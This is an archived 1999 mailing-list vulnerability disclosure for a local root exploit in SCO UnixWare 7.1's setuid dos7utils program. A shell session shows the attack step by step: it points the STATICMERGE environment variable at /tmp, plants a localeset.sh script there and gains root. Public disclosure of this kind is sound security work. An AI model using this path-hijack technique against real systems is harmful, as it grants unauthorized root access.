SCO UnixWare 7.1 local root exploit

From: Brock Tellier (btellierat_private)
Date: Tue Oct 05 1999 - 11:30:49 PDT


Greetings,

A vulnerability exists in the /usr/lib/merge/dos7utils program (suid root by
default) which allows any user to execute any command as root.  The dos7utils
program gets its localeset.sh exec path from the environment variable
STATICMERGE.  By setting this to a directory writable by us and setting the -f
switch, we can have dos7utils run our program as follows:


bash-2.02$ uname -a; id; pwd
UnixWare fear71 5 7.1.0 i386 x86at SCO UNIX_SVR5
uid=101(xnec) gid=1(other)
/usr/lib/merge
bash-2.02$ export STATICMERGE=/tmp
bash-2.02$ cat > /tmp/localeset.sh
#!/bin/sh
id
bash-2.02$ chmod 700 /tmp/localeset.sh
bash-2.02$ ./dos7utils -f bah
uid=0(root) gid=1(other)
groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit),10(nuucp),12(daemon),23(cron),25(dtadmin),47(priv),9(lp)
bash-2.02$ 
----

Searching through the securityfocus vulnerability archives yields 0 matches
for search string "unixware", but several for "openserver".  I thought this
was rather strange, considering that SCO is discontinuing OpenServer after
5.0.5 in favor of the much more reliable (though not security-wise, evidently)
UnixWare 7.  And so begins my audit of the virgin UnixWare 7 so soon after my
incomplete audit of SCO 5.0.5.

Brock Tellier
UNIX Systems Administrator
    
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:06:44 PDT